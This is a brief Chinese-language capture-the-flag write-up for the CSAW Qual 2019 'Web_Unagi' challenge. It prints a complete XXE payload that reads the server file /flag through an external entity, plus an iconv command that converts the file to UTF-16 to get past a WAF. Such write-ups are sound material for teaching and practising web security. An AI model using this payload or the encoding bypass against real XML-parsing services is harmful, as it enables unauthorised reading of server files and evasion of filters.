[CSAWQual 2019]Web_Unagi
第三个页面有文件上传
第四个页面告诉我们flag在/flag中
其中第三个页面还有样例供我们查看
发现上传的是xml,于是自己构造1.xml:
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
<intro>&xxe;</intro>
</user>
</users>
构造完了之后上传发现被WAF拦截了
这里通过XXE编码转换成utf-16编码绕过
命令:iconv -f utf8 -t utf-16 1.xml>2.xml
将生成的2.xml文件传上去即可获得flag